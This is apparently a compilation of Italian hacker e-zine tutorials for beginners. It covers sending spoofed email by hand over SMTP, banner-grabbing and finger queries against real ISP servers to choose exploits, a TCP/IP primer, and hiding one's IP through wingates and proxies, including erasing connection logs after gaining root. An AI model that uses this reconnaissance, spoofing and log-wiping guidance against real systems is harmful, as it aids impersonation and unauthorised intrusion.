Se devo essere sincero, parlare di fake-mails mi risulta un po' complicato per
due motivi fondamentali:

Il primo, deriva sicuramente dalla notevole mole di informazioni
sull'argomento gia' pubblicata da altri... e tirare fuori qualcosa di
interessante ed, allo stesso tempo, originale e' una cosa abbastanza
complicata.

Il secondo e' di carattere un po' piu' tecnico.
Infatti, per quanto il nocciolo dell'argomento sia abbastanza semplice ed alla
portata di tutti, parlare di fake-mails implica tutta una serie di conoscenze
che e' difficile dare per scontato (soprattutto se penso che questo articolo
potrebbe anche essere letto da un "newbie" o da un "wannabe").

Quindi tentero' di essere il piu' completo possibile, ma senza scendere troppo
nei particolari di argomenti come "Telnet ed i suoi comandi" o "Anonimous
Remailers" ai quali, magari, dedichero' altri articoli.

E chissa' che scrivendo questo articolo non riesca a mettere un po' di ordine
anche nella mia testa, dato che sul mio hard disk ho una trentina di documenti
che parlano di FAKE-MAIL$...

--->Disc-LAMER<---

(lo so che si scrive Disclaimer... ma non so se avete capito il sottile gioco
di parole!!)

Ho scritto questo articolo per INFORMARE e non per istigare o determinare in
qualcuno la volgia di compiere azioni illecite.
Se pensi che violare le leggi informatiche sia il modo migliore per
affascinare e guadagnare la stima dei tuoi amici, smetti subito di leggere.
Non c'e' niente di affascinante o di interessante nel diventare un criminale.

§ The Jackal §

--->LeT's BeGiN<---

Se la maggior parte di voi sa che per spedire una mail non occorrono tutti
quei programmini che ci vengono propinati dalla mattina alla sera nelle
riviste specializzate (vedi ExploDER, Netscape, Opera ecc. ecc.), forse non
proprio tutti sapranno che, per inviare una mail, non occorre nemmeno avere un
account sul server dal quale volete spedire. (lo sapevate gia'? Dhooo!!).
Tutto quello che vi serve e' il semplice e solo IP address del server o il suo
nome host.
Una volta scovato "l'indirizzo" (chiamiamolo cosi'), dovrete "telnettarvi"
alla porta 25 di quel server e qui, nella maggior parte dei casi, vi
aspettera' il "demone" piu' bucherellato della storia di tutti i software...
ovvero il SendMail.
Per tutti quelli che hanno sentito parlare di "demoni" solo nei film e nei
Giochi di Ruolo (Cyberpunk rulez!!), diro' che anche nell'informatica esiste
questo termine.
In particolar modo, nel nostro caso, "demone" sta ad indicare un programma che
si pone in ascolto su una determinata porta ed aspetta le nostre connessioni.
(ora che avete fatto la sua conoscenza, posso smetterla di scriverlo fra
virgolette!!)
Alcuni demoni, poi, nel momento in cui vi collegherete, vi daranno la
possibilita' di interagire (vedi SendMail), altri, invece, vi risponderanno
soltanto con del teso scritto dal System Administrator.
Fatte alcune puntualizzazioni di carattere teorico (sperando che abbiate gia'
chiari i concetti di IP address e di hostname), passiamo ora alla parte un po'
piu' pratica.
Dicevamo che per creare la vostra (fake) mail bisogna "telnettarsi" alla porta
25 del server (che nel 99% dei casi sara' quella che gestisce la posta in
uscita) ed interagire con il SendMail.
(perche' ho scritto fake fra parentesi lo scoprirete soltanto alla fine
dell'articolo...)
Ora, supponendo che il nome dell'host sia fragolone.com , la procedura di
connessione al server remoto (quello che io chiamo "telnettarsi") e' sempre la
stessa:

C:\Windows\telnet.exe -->aprira' l'applicazione telnet di default di
-->Windows.

Quindi nel campo Ip\Hostname andrete ad inserire il nostro esempio
"fragolone.com" (senza le virgolette!!) e, per la porta, naturalmente, la 25.

NB. In ambiente Windows e' consigliabile utilizzare altre applicazioni diverse
da quella di default, dato che quest'ultima non e' molto performante...
come tutto il sistema opertivo del resto. Ad ogni modo la procedura e' la
stessa per qualsiasi altro progz.

Se vi muovete in ambiente Unix, digitate:

telnet fragolone.com on port 25

Fatto? Bene... ecco cosa mi e' comparso a schermo quando l'ho digitato:

220 ciccio.fragolone.com ESMTP Sendmail 8.9.3/8.8.6;
Sat 1 Jan 1900 14:23:04 +0000 (GMT)

(ti pareva che non dovevo beccare un server con il bug!!)...

NB. Lo sapete che anche il sito ufficiale di Star Trek stamattina riporta come
"data astrale" il 1900... eheheh... si potrebbe aggiungere un altro film
alla serie... gia' vedo il titolo:

"Star Trek 31/12/1999: L'ultima frontiera"...

Dopo questa battuta squallidissima, fatta per distendere un po' chi, dopo aver
visto quella serie incomprensibile di cifre e lettere, aveva gia' deciso di
cambiare articolo, passiamo ad analizzare "al volo" proprio il banner di
log-in del demone (nel nostro esempio, SendMail), in modo da non lasciare
nessun punto in sospeso.

Il numero subito alla sinistra (220) e' quello assegnato al tipo di messaggio
visualizzato (in questo caso il log-in). Se, ad esempio, causerete un errore,
vedrete che il numerino sulla sinistra cambiera' (infatti il messaggio sara'
diverso); altrettanto succedera' se proverete a digitare il comando HELP. (vi
consiglio sempre di leggere molto bene tutte le pagine degli help... si
impara molto piu' li' che su altri 1000 miei articoli!! Inoltre l'help e'
fondamentale per capire quali comandi servono per interagire con il demone).

--->LeT's CoNtInUe<---

Per quanto riguarda, invece, la parte successiva al 220
(ovvero "ciccio.fragolone.com"), bhe'... questo non ci dice niente che gia'
non sappiamo... ci segnala solo a cosa siamo collegati.

ESMTP invece ci dice qualcosa in piu'...

Infatti questa sigla abbrevia la frase
"Extended Simple Mail Transfer Protocol".

Questo non e' altro che il protocollo (ma sarebbe meglio dire, "una serie di
regole prestabilite, utilizzate dai computer per iteragire fra di loro") usato
dal client di posta per comunicare con il SendMail.
La versione Extended del protocollo (ESMTP) si differenzia da quella piu'
classica e ad oggi, forse, piu' utilizzata (SMTP) per la semplice aggiunta di
alcuni comandi (che imparerete sicuramente meglio di quanto io ve li possa
spiegare ora leggendo l'help sopra consigliato).

Sendmail 8.9.3/8.8.6 ci indica, invece, il nome del demone in ascolto e la sua
versione (questa informazione sembra fatta ad hoc per chi voglia avventurarsi
nel tentativo di hackerare il server... attraverso queste informazioni,
infatti, si potra' ricercare l'exploit adatto e al 99% dei casi perfettamente
funzionante... eliminando cosi' una parte del lavoro).

Il resto del banner e' costituito solo dalla data, dall'orario e da altre cose
marginali.
Come avete potuto vedere (o meglio, leggere) non era poi cosi' complicato
interpretare il significato di quel banner!!
Detto questo, possiamo finalmente cominciare a scrivere la nostra (fake) mail.
Bisogna dire che il computer, pur essendo una macchina, e' infondo molto
educato e pertanto pretendera' al momento del log-in che voi lo salutiate con
il comando:

hello <hostname>

(ricordatevi che i comandi variano a seconda non solo dei demoni in ascolto
sul server, ma anche in ragione delle semplici versioni di uno stesso demone...
consultate quindi l'apposito help).

Attendete che risponda al saluto e cominciamo...
Prima cosa da inserire e' il mittente, utilizzando il comando:

MAIL FROM: <bill_gates@microsoft.com> (manco di fantasia!!)

Se avrete scritto giusto, il server rispondera':

250 bill_gates@microsoft.com ... Sender OK

Ora dobbiamo inserire il destinatario digitando:

RCPT TO: <vero_uomo@amico.it>

Ancora, se tutto e' giusto, otterremo come risposta:

250 vero_uomo@amico.it ... Recipient OK

(potete aggiungere quanti destinatari volete semplicemente ripetendo il
comando... o almeno cosi' e' stato per me)

Ora che gli abbiamo dato le coordinate necessarie, possiamo inserire il testo
del messaggio.
Dando il comando DATA, il server risponde:

350 Enter mail, end with "." on a line by itself

Ci dice che lui e' pronto a ricevere il corpo del messaggio e che, quando
abbiamo finito di scriverlo, glielo facciamo capire digitando un punto su una
linea vuota.
Un esempio? Scriviamo:

SUBJECT: Questa e' una prova di (fake) mail
Se mi stai leggendo, significa che ho imparato a mandare
le mail senza Exploder!!!
. <------- Questo e' il punto... non e' una macchia sullo schermo!!

Dando INVIO dopo il ".", il server spedira' automaticamente il messaggio e ci
rimandera' il codice identificativo della (fake) mail appena scritta:

250 IAA28884 Messagge accepted for delivery

(ricordatevi questo ID, perche' e' uno dei motivi per cui continuo a scrivere
(fake) mail fra parentesi).

Bene, se avete mandato questa (fake) mail a voi stessi o ad un vostro amico,
e' tutto OK...
Se, invece, avete mandato una lettera minatoria al vostro capo-ufficio, ed il
soggetto in questione non e' un ignorante, fate conto che siete gia' nei guai.
Non ci credete? Ve lo dimostro...
Andiamo a vedere un po' cosa e' arrivato nella nostra casella di posta
elettronica.
Allora, sembra una mail normalissima... spedita da... wow!!... Bill Gates!!
La verita', pero', viene fuori non appena andiamo ad analizzare gli "headers"
completi della mail. (con Netscape li potete vedere abilitando l'opzione
apposita... mi sembra che si trovi nel menu' "Visualizza"; per Outlook,
invece, tasto destro del mouse sul messaggio e scegliete
"Proprieta'---> Dettagli").

Analizzando un po' quello che ci compare sullo schermo, vediamo che nel campo
RECEIVED fa bella mostra di se' l'IP e il nome host del mittente.
Ora, ad occhio nudo si puo' vedere che Microsoft non compare in nessuna linea
(ergo... ci troviamo difronte ad una fake mail), ma se volete essere sicuri al
100% (anche perche' in alcuni casi potreste avere a diposizione solo l'IP e
non anche hostname), bastera' giocherellare con il comando:

nslookup - ip address (per chi utilizza Unix)

o scaricare qualche programma per Windows che abbia questa utility (il mio
consiglio si chiama GENIUS... fa il suo lavoro egregiamente e comprende anche
altre utilita' come Whois, il Ping, il Traceroute ecc.ecc.).
Niente Microsoft, quindi, ma voi questo lo sapevate gia' ;-)

Se questo, pero', non dovesse bastare, due o tre righe piu' in basso trovate
un campo, dal nome "MESSAGE ID", che riporta dei numeri e delle lettere un
po' strani

MESSAGGE ID: <00301bf5460. IAA28884@ciccio.fragolone.com>

Non vi ricordano niente?
A me si, e mi fanno venire in mente il MID che ci aveva dato il SendMail dopo
aver scritto la (fake) mail...
Cio' vuol dire che sul server di 'ciccio.fragolone.com', a quell'indirizzo,
ci saranno conservate tutte le informazioni riguardanti il Messagge ID (MID
appunto).

Beccati due volte!! Ecco perche' il (fake) e' soltanto ipotetico...
Per bypassare questi inconvenienti, si potrebbe tentare di spedire una mail
direttamente dal server di Microsoft o attraverso qualche account che sia
connesso a questo, in modo da far risultare quantomeno il passaggio...
Delusi? Bhe', guardatela dal lato positivo... se voi ed un vostro amico
sfruttate lo stesso ISP, potrete sempre mandare una fake mail che sembri
provebire dall'amministratore del sistema... (per il contenuto, non pongo
limiti alla vostra fantasia)... e questa risultera', naturalmente, autentica
in ogni sua parte.

--->EsCo<---

Spero di non aver fatto un articolo troppo scontato (del resto l'ho scritto
che era per veri Newbies)... come al solito scrivetemi per qualsiasi lamentela
o domanda a:

<sciacallo@virgilio.it>

End of messagge........

---The Jackal---

-=!!!|-p0rT_sUrFinG tUt0rIal-|!!!=-

Allora ragazzi questo è il primo articolo che scrivo per AiS e spero che ne
seguiranno altri, l'intenzione è quella di fornire a tutti i newbies una
guida passo passo al mondo dell'hacking cosa che io non ho trovato quando
ho iniziato, molte cose le ho dovute capire da me, e ci ho perso un mucchio
di tempo. Vabbè basta con ste cazzate iniziamo............
Prima di tutto una premessa.........................
Allora, se non sapete un cacchio di hacking ma vi piacerebbe iniziare,
continuate a leggere, a patto che non pensiate appena finito l'articolo che
sarete capaci dientrare nel mainframe del NORAD o della NASA (almeno non
subito hihihi). Sicuramente imparerete però che internet non è solo Internet
Explorer, e che la grande rete non è solo Microsoft e non è solo Windows....
ideato dal vecchio Bill, per farvi rimanere nell'obblio di semplici utenti
del suo sistema. (Bella la frase vero?)
Vi siete stufati di battervi la letterina con word? Vi siete stufati di
giocare col vostro giochetto 3D preferito? ....bene allora avete un futuro,
avete percepito qualcosa. Se invece il computer vi basta così, con il vostro
bel giochetto, e con word e le sue ricche funzioni allora smettete di leggere
il mio articolo e continuate pure così, sarete sempre l'utente preferito da
mamma Microsoft uno che non si allontana dagli schemi, uno dentro al gioco.
Questa vuole, come vedete, essere una guida all'underground informatico, una
guida per uscire dai canoni di semplice utilizzatore, e liberarvi da tutte le
schiavitù digitali.
Sto dicendo troppe cazzate oggi........
Non vi dico che non sono responsabile per ciò che farete di queste informazioni
perché gia lo sapete, se vi mettete nei guai, non sono fatti miei, io non vi
conosco, e voi non mi canoscete, usando queste informazioni vi rendete conto
che siete i soli responsabili delle vostre azioni.
Un primo consiglio è quello di installarvi Linux lo trovate gratuitamente,
ormai lo regalano con le riviste. Se avete windows per ora potete utilizzare
Telnet (ma procuratevi Linux), per le prime lezioncine può andare bene anche
win95/98, ma andando più avanti vi serviranno compilatori ecc...e con win non
li avete.
Inoltre se volete entrare in un sistema Unix dovete capirne il funzionamento,
e linux vi permette di capire tutto. Quando io usavo solo windows, i miei studi
sull'hacking erano forzatamente limitati e ho iniziato ad interessarmi di nuke
e cazzate così. Un lamer ecco cos'ero. Oggi non mi sento un hacker, ma capisco
che il mio approccio è più costruttivo e basato su una qualche forma di
conoscenza trasferibile agli altri. Comunque se avete linux tutto cambia,
avrete a disposizione linguaggi da imparare e un intero sistema operativo che è
identico a quelli che volete bucare......ed è diverso da win. Mentre aspetto
che ve lo installate iniziamo con gli strumenti che abbiamo.
Sto iniziando proprio dall'inizio così mi potete seguire e tutta la premessa
scritta prima penso sia proficua per uno che non sa nemmeno cosa sia l'hacking.
Chiariamo una cosa, i sistemi a cui facciamo riferimento, in cui vogliamo
entrare, saranno dei server di rete Unix, cioè parleremo degli internet provider
......a cosa state pensando? A tin, tiscali, si loro......magari non proprio
loro ma l'idea rende molto bene. L'obbiettivo di un hacker è quello di entrare
dentro questi sistemi,(e non nel pc dell'amico!!!!) ed assumere privilegi di
root. E che significa?
Dentro un sistema Unix/Linux ci sono due tipologie di utenti, L'utente normale,
che non può accedere ad alcune funzioni di sistema e ad alcune directory, ed il
root che sarebbe l'amministratore, che può fare tutto ciò che vuole sulla
macchina. Ricordate questa differenza se siete agli inizi ed installatevi linux.
Perciò obbiettivo individuato: Entrare nella macchina e divenire root.
Dicevamo il portsufing, prima di entrare in un sistema avrete bisogno di una
serie di informazioni sullo stesso, che vi serviranno per bucarlo; le
informazioni che un sistema lascia sulla rete sono, infatti, la sua prima
debolezza. Ricordatelo.
Il portsurfing è appunto la tecnica di collegarsi ad un sistema su tutte le
porte che questo lascia aperte per avere più informazioni possibili.
Per capire questo dovete avere almeno un'infarinatura di come funziona la rete.
La rete è organizzata in servizi: web, posta elettronica, ftp ecc. Un sistema
(Unix che sarebbe un server di rete) organizza tali servizi e li gestisce
tramite dei programmi ogni programma e perciò ogni servizio funziona su una
porta? Chiaro? Che significa? Ad esempio quando vi collegate al vostro sito
porno preferito state usufruendo di un servizio (web) che è fornito e gestito
dal vostro provider tramite la porta 80.
La posta elettronica? Il server è sulla porta 25 e così via....
Funziona così: quindi quando spedite un messaggio di posta elettronica il
vostro fidato Outlook si connette alla porta 25, quando vi scaricate una pagina
web explorer si collega col server alla porta 80 ecc. forse questo voi non
lo avete mai saputo....state sicuri che la Microsoft non è interessata a
dirvelo. Se vi interessa un elenco di tutte le porte che ci sono su un sistema
leggetevi l'articolo di ]CyBoRg[ nel numero uno di AiS. Ora voi vi starete
chiedendo ma me che mi interessa? Io voglio entrare nel sistema e non conoscere
la rete. Sbagliato perché per entrare in un sistema ci servono tutte
informazioni possibili sullo stesso, seguitemi ancora un poco e capirete.
Noi useremo telnet(un programma di windows) per collegarci ad ognuna di queste
porte, non entreremo nel sistema, ma carpiremo (che bel vocabolo, cazzo) una
serie di informazioni che ci consentiranno più in la di entrarci.
Intando procuratevi un buon portscanner, un programma che ti consente vi sapere
quale di queste porte è aperta,......io ne uso uno che ha anche altre funzioni,
si chiama Netinfo, procuratevelo sulla rete il link non lo ricordo...fate una
ricerca.
Per quando riguarda Telnet, si trova nella cartella c:\windows per cui andate
a cercarvelo, ti consente di conneterti ad un sistema remoto, in qualunque porta.
Siccome ha dei malfunzionamenti vari vi allego una versione da me consigliata
nella ezine. In questa si puo cancellare e sopratutto vedere quello che scrivi.
Oltretutto spesso in quello di win l'emulazione terminali funziona male.
Comunque lo trovate negli allegati si chiama Turbo telnet.
Dove trovate l'indirizzo di un sistema remoto? Bene vi do un URL che contiene
tutti i provider italiani ordinati per regione e provincia....proprio tutti!

http://www.cilea.it/www-map/NIR-list.html

ok ad ogni porta corrisponde un servizio, abbiamo visto, e ad ogni servizio
corrisponde un programma che lo gestisce. I sistemi linux/Unix chiamano
questi programmi che si occupano di gestire i servizi di rete daemon cioè
Demoni.
I Demoni sono in sostanza i custodi di tutti gli accessi al sistema, e si
occupano della gestione di un particolare servizio su una porta ad essi
associata. Quando proveremo con un programma tipo telnet a collegarci a quella
porta troveremo un demone ad aspettarci, e vi assicuro che non sarà facile
superare la sua sorveglianza.......a meno che non conosciate dei trucchi.
Ecco un elenco di alcune porte (per ora vi bastano) e dei demoni che sono
associate ad esse.

Porta Servizio Daemon
25 Posta Elettronica Sendmail
80 http/web Httpd(Apache)
79 Informazioni Fingerd
21 Ftp Ftpd(Wu-Ftp)
23 Telnet login

ok i daemon sono programmi, e come tutti i programmi hanno dei bug, conoscere
i bug associati ad ogni versione significa poterli sfruttare a vostro vantaggio
per entrare nel sistema. Stiamo parlando dell'essenza stessa dell'hacking cioè
degli "exploit".
Già gli exploit, sfruttare un bug per ottenere un accesso alla macchina, magari
tramite un programmino che faccia funzionare il tutto. Ma come riusciamo a
capire i bug che ha un daemon? Semplice guardando la versione dello stesso.
Capirete tra un po. Ok avete avviato telnet? Bene in "sistema remoto" mettete un
server di quelli che trovate all'URL che vi ho dato, uno a vostra scelta...vi
collegate alla sua pagina web vedete l'indirizzo e lo mettete in telnet
(togliendo naturalmente sia "http://" e anche tutto cio che c'è dopo la prima
"/" (oh signore vi devo aiutare fino a questo punto?), ora in Porta mettete un
numero ad esempio 23 telnet e vi collegherete a quel server alla porta 23. Vi
dovrebbe accogliere così.....

RedHat Linux 6.1 (Cartman)
Ver. 2.2.13
Login:

questo dipenderà comunque dalla macchina bersaglio....potrebbe non essere un
linux RedHat ma un altro linux tipo SUSE o CALDERA ma anche un altro UNIX,
SCO, SUN ecc. Ora immagginate di conoscere login e password a quel punto sareste
dentro, ma siccome non è con l'immagginazione che si buca un server non vi
mettete a provare login e passwd perché i vostri tentativi sono registrati
in un file...un file che logga tutto quello che digitate. Limitatevi a segnarvi
la versione ed il tipo di sistema operativo, e fatelo con molti server. Vedrete
che ci sono moltissimi sistemi operativi, e che alcuni non vi daranno le
informazioni che cercate.
Passiamo ora alla porta 25: il demone associato al servizio di posta elettronica
si chiama " sendmail " come abbiamo visto, come fate a che versione di sendmail
gira su una macchina? Stesso discorso di prima vi collegate col telnet ad un
provider e nella porta mettete ora 25.
Sendmail vi dovrebbe dare il benvenuto cosi:

220 prova.it Sendmail x.x/x.x 11/4/00 ready at Mon, 30 Apr 00 06:22:19 -0200


Aahhh dimenticavo se non vi appare nulla presentatevi al demon con....

Hello x.x

Puo essere che vi risponda. In x.x potete mettere qualunque nome, ricordate che
il demone conosce il vostro ip per cui non fate stronzate. Provate sempre con
molti server e segnatevi il numero di versione.
Bene sulla porta 79 potrete chiedere informazioni su ogni singolo utente.
Collegatevi agli stessi server di prima e cambiate solo il numero di porta.
Qui non vi apparirà nulla sicuramente. Il domone "fingerd" non vi accoglierà
con nessun messaggio. Che fare? Inserite un nome seguito da return per avere
inormazioni su quell'utente. Voi direte: come faccio a cercare informazioni su
un utente se non so nemmeno che nome mettere? Ed io vi rispondo.............. semplicemente..........provate con "root" all'inzio.
Il root esiste sempre perché si tratta dell'amministratore di sistema.
Vi darà qualcosa del del genere:

root
Login:root Name:Fabio Rossi
Directory:/root Shell:/bin/sh
Last login Wed Apr 10 11:26 (CET) on tty
No Mail
No Plan.

La connessione si chiuderà automaticamente subito dopo, questa è una
caratteristica di fingerd. Come vedete già sappiamo il nome
dell'amministratore di sistema, la sua directory principale, il suo username
(login), la sua ultima connessione(last login) ed il tipo di shell che
possiede. (Non sapete cos'è una shell? Questo non ve lo dico........siete
proprio svogliati andatevelo a studiare con linux dovrete iniziare prima
o poi!!)
Un altro "demone" attaccabile è il wu-ftpd, si tratta del programa che si
occupa della gestione del server ftp la porta è la 21. Dovete sapere che
spesso potrete entrare in una macchina su questa porta ed avere accesso a
tutti i files che essa mette a disposizione su ftp anche non avendo un
account. Si tratta di accedere come utente "anonymous" molte server unix ve
lo consentono.
Usiamo sempre telnet, in accesso remoto mettete un server del tipo......
www.mediatel.it e come porta la 21 (ou attenti questo è un address vero, non
vi collegate tutti a questo, o l'amministratore se ne accorge di tutte queste
prove di tutta sta gente, cambiate caxxo vi ho dato una lista).
Ora non vi dovrebbe apparire nulla. Digitate:

USER anonymous
PASS nessuno@niente.it

abbiamo messo nessuno@niente.it perchè l'accesso anonymous presuppone che v

  
oi
forniate un indirizzo email come password....non vorrete metterci quella vera!
Se tutto ha funzionato avrete una risposta del tipo:

Sistema.it wu-ftp2.4.0(2) bla bla bla.......
USER anonymous logged in

se siete dentro cominciate a provare alcuni comandi di unix.

pwd
ls -l

vedete un poco a cosa servono. Segnatevi la versione di wu-ftpd ed uscite.
Vi do gli ultimi consigli e poi si chiude ok?
Segnatevi sempre le versioni che trovate...ricapitolando avremo

- la porta 23 è quella di TELNET da qui avrete la versione del SO (sistema
operativo)
- la porta 21 è quella del servizio FTP da qui avrete la versione del daemon
wu-ftp
- alla porta 79 trovate fingerd
- alla porta 80 trovate i servizi web tipici.
- provate pure altre porte ad esempio 514, 515, 702, o le porte di irc, se si
tratta di un server irc..da 660 a 670 insomma provate. Per ora direi che può
bastare, la prossima volta studieremo più da vicino ogni singolo daemon e gli
exploit corrispondenti, dove reperirli ed altre cosine. Se avete problemi
mandatemi una email vulcan12mm@hotmail.com.

Ciao da

---Vulcan---



-=!!!|-TCP/IP 4 nEwbIeS-|!!!=-

Autore: SONOunuomo

comandante squadra : SonoUnUomo
obbiettivo : cercare di scrivere almeno due o tre parole sensate senza
discendere nella mia stupidita' e cominciare a scrivere le
solite cazzate che dico ....

Bene ora si puo' cominciare.
3.....
2....
1...
Start !

Allora, le reti e i computer di tutto il mondo possono condividere
informazioni e messaggi su internet grazie ad un sistema (apparentemente)
semplice .
Cioe' ogni informazione di Internet viene frammentata (cioe' suddivisa) in
tanti pacchetti e consegnate alla loro destinazione dopo di che questi
pacchetti vengono riassemblati in modo che possano essere utilizzabili da chi
li riceve.
Questo e' quello che fa il Tcp (Transmission Control Protocol) e l'Ip
(Internet Protocol),
spesso chiamati collettivamente TCP/IP.

Il TCP frammenta i e poi riassembla i pachetti , mentre l'IP ha la
responsabilita' di far arrivare i pacchetti alla giusta destinazione.
Si usa il TCP/IP perche' internet e una cosidetta (puttana ....c'e' gente che
la penetra da per tutto eheheheh) rete a commutazione di pachetto .
In questa rete non esiste un'unica connessione ininterrotta, ma bensi quando
vengono inviate le informazioni sono suddivise in piccoli pachetti, inviati
contemporaneamente su piu' percorsi e poi riassemblati all'estremita'
ricevente.

Il sistema telefonico invece e una commutazione di circuito. In questo tipo di
rete, una volta stabilita una connessione (cioe' ad esempio con una telefonata
alla mia tipa ... anzi la Saluto : CIAO ROSY!!!!!),
quella parte della rete e dedicata solamente a quella singola "connessione".

Perche i computer sfruttino a fondo Internet, debbono usare un software
speciale (uhaaaaooo) in grado di capire e interpretare
(attenzione al mio italiano !! Ai compiti non scrivo mai cosi'!!!)
i Protocolli TCP/IP: tale software e chiamato socket o stack TCP/IP.

In windows il software si chiama Winsock, disponibile in diverse versioni .
questo software funge da intermediario tra un client e un computer server.
Senza questo software ci si puo' collegare ad internet ma si possono utlizzare
solo le parti piu' scazzose, scapocchione e rudimentali.
In realta la stack TCP/IP risulta formata e suddivisa in 4 strati:
Lo strato Applicazione (Dove opera il sofware operativo),
lo strato di trasporto (dove operano i protocolli UDP e
TCP per il trasporto di dati),lo strato internet e lo strato della rete (dove
opera il protocolo IP, ICMP, IGMP )

L'UDP, il TCP, l'IP, l'ICMP che hanno le seguenti funzioni :

TCP : E' il cosidetto protocollo per la trasmissione di dati controllata cioe':
IP : E' il protocollo che viene utlizzato e l'indirizzamente dei dati
attraverso la rete cioe' e lui che dice ai dati dove devono arrivare .
ICMP: (internet Control Message Protocol): e il protocollo che si occupa della
trasmissione dei messaggi di errore e di richiesta nella rete.
UDP : Permette la trasmissione di dati ma al contrario del TCP/IP non e una
trasmissione sicura cioe' se si perdono informazione durante la
trasmissione te lo prendi nel ( \/ |_ 0 .

Pero' al contrarion del tcp e molto piu' veloce e viene utlizzato da
applicazioni tipo il Real Player.

Glossario facile facile :

Header : A ogni pacchetto e' assegnato una intestazione (header in inglese)
che contiene varie informazioni, come l'ordine in cui assemblare i pacchetti
con gli altri una volta che sono arrivati a destinazione inoltre inserisce una
checksum (che e spiegata sotto ) che e calcolata in basa alla quantità di dati
presenti nel pacchetto.

Esempio di trasmissione dati dalla TCP

0 = pachetti TCP (ehehehe non assumete un killer per uccidermi please ehehehe)
____________
| |
|Mio computer|
|____________|
|
\-DATI--la tcp* frammenta i dati--I--T--D--A--l'IP*incapsula i dati
e li indirizza
|
+....................0......0......0.....0........................ |
| ROUTER
| \/ Il router fa un smistamento dei pacchetti
| +--------+ |-----------0----------------+
|---------0----0------0----| |-----|----------0-----------+ |
+--------+ |---------0-------+ | |
| | |
| | |
| | |
\ | /
\ | /
TCP

(a questo punto il tcp controlla gli header
dei vari pacchetti e confronta la checksum con il
contenuto di ogni pacchetto e nel caso il
pacchetto risulta danneggiato lo Ririchiede mandando
un messaggio ICMP in cui richiede che solo quel
pacchetto venga rispedito. quando tutti dati giungono
correttamente a destinazione vengono riassemblati
e possono ora essere leggibili)
|
DATI
|------------------|
| computer |
| destinazione |
| |
|------------------|

* = c'e' da dire che l'IP indirizza i dati assegnando loro un indirizzo Ip di
destinazione e l'indirrizzo Ip da cui e' partito il pacchetto dati

**= inoltre la TCP scrive in ogni header dei pacchetti un checksum che calcola
in base al contenuto del pacchetto

Allora ora arrivano le mie considerazioni. Ho scritto questo manuale per darvi
almeno un idea di fondo su come funziona la rete avrei potuto (e dovuto)
dilungarmi di piu' ma vi assicuro che alla fine avreste avuto solo le idee
piu' confuse dopo aver letto e capito questo manuale vi consiglio di leggere
lo stack TCP/IP e i socket di Lurkin nel quale nonostante confonda le idee per
qualche argomento di cui non sono sicuro neanche io.
VI dara sicuramente una visione piu' globalizzata e meglio strutturata di
tutto il procedimento per ora l'importante e che sappiate + o - come minchia
funziona la trasmissione di dati e che impariate a memoria il manifesto
hacker del Mentor e lo comprendiate a fondo in quanto neanche io nonostante
l'abbia imparato a memoria (si sono un pazzo lo ammetto) ho compreso a fondo
il suo significato e ricordate in ognuno di noi c'e' un piccolo Linus .

Si ringrazia Preston Gralla da cui ho preso buono spunto

---SONOunomo---


-=!!!|-0cCulTamEnt0 E dIsSimUlAzI0nE-|!!!=-

Autrice: Azalin

Premetto di non essere ne un'hacker ne una programmatrice, solo una
che sta' imparando un po' a giocare con la rete e a muovermi con linux se
siete gia' dotti sui punti che trattero' in questo articolo (cosa
abbastanza facile), JP al prossimo_articolo :)

brevente:
1 - metodi di anonimizzazione di una connessione
2 - metodi di dissimulazione dopo essersi connessi

allora, prima chiariamo un punto:
MA a cosa serve anonimizzarci ? i motivi possono essere vari, del resto
non e' necessario x hackkare anonimizzarsi, e non e' nemmeno vietato
anonimizzarsi x mandare una mail :)

ci sono metodi leciti e [meno] leciti x raggiungere questo scopo (ovvero
andare in giro con un ip diverso da quello asseganto dal vostro provider,
che sia tiscali o iPass :)

Se vogliamo connetterci con un ip diverso dal nostro, sara' necessarrio
avere dei sistemi su cui "bouncare" o "saltare", questi sistemi possono
essere delle shell che permettono telnet, dei wingate, dei proxy,
particolari router (+ che particolari bisogna saperli usare :) NetBlazer
dialout e redirector.

wingate e proxy sono semplicemente dei servizi che permettono di far
passare la connessione da me ad un altro server, facendo apparire pero' il
suo ip. quindi:

IO ----------------> proxy/wingate --------------> SERVER

questo sistema rallenta un po' la connessione, non c'e' che dire :)
inoltre, rimane loggato sul proxy o sul wingate il fatto che voi siete
arrivati a quell'ora, e il server registra la connessione fatta su di lui
a nome del proxy, questo vi rende anonimi ma non irrintracciabili.

il proxy a cui alludo non e' solo lo "squid" di turno sulla 8080 (http),
ma il proxy server sulla 1080, che e' in grado di fare da bouncer x
connessioni FTP, irc telnet ecc...

i metodi di utilizzo di un wingate sono semplicissimi :

(con ircII) :
/server <wingate>:23 /quote <irc server>:6667

x effettuare una connessione a mio.dns.org basta fare:

WinGate>mio.dns.org porta

e verrete immediatamente catapultati nel vostro dns alla porta da voi
decisa.

bhe, queste tecniche non sono che le piu' elementari... bounciare e'
semplicissimo se si usa una shell che consenta l'uso di telnet o di ssh da
li' (quindi non le free-shell) nel caso voi abbiate l'accesso root della
shell, allora potete anonimizzarvi con un buon grado di sicurezza, visto
che in seguito all'utilizzi della shell come bnc potrete cancellare i log
della vostra connessione.

bnc ? cosa ho scritto ?

il bnc e' un programma che consente il bouncin da remoto, trovate su
packetstorm l'ultima versione, simile a questo esiste un altro programma
detto "datapipe" di cui trovate una descrizione dettagliata sul primo
numero di BFI (www.s0ftpj.org)

Redirectors... solamente una volta ho visto un redirector, e non so bene
nemmeno di che servizio si tratti, cmq svolgeva pressoche' la funzione di
un wingate.

x utilizzare router x bounciare bisogna, appunto, saper utilizzare router
(e purtroppo non e' il mio caso) a parte che non so se e' comune tra i
router concedere connessioni, in ogni caso... non ho le idee ben chiare su
come utilizzarli.

Dialout - NetBlazer - "cu"
questi sono sistemi utilizzati x raggiungere telfonicamente un altro host
che accetta connessioni da un modem (un comune isp) anche questo e' un
metodo utilizzato x bounciare. il NetBlazer, puo' essere anche utilizzato
come wingate.

metodi legali: i metodi legali x anonimizzarsi sono 2, uno e' utilizzato x
le email e l'altro x il web. il primo viene soddisfatto da in numerosi
anonymous remailer in giro x il mondo, l'altro e' l'utilizzo di proxy
anonimi, che quindi non consentono la visione dell'ip occultato (mi
chiedo perche' non sono cosi' TUTTI i proxy ... bhoooo...)

x quanto riguarda gli anonimous remailer, si ha la perfetta sicurezza che
il messaggio non ria rintracciabile, per quanto riguarda i NYM server
invece, e' possibile che un potenziale "nemico" o la polizia, abbia
accesso al database degli utenti registrati... comunque queste sono
paranoie eccessive.

invece, un proxy anonimizzante, non e' cosi' sicuro IMHO, sono certa che
terra' i log di tutti coloro che navigano attraverso.
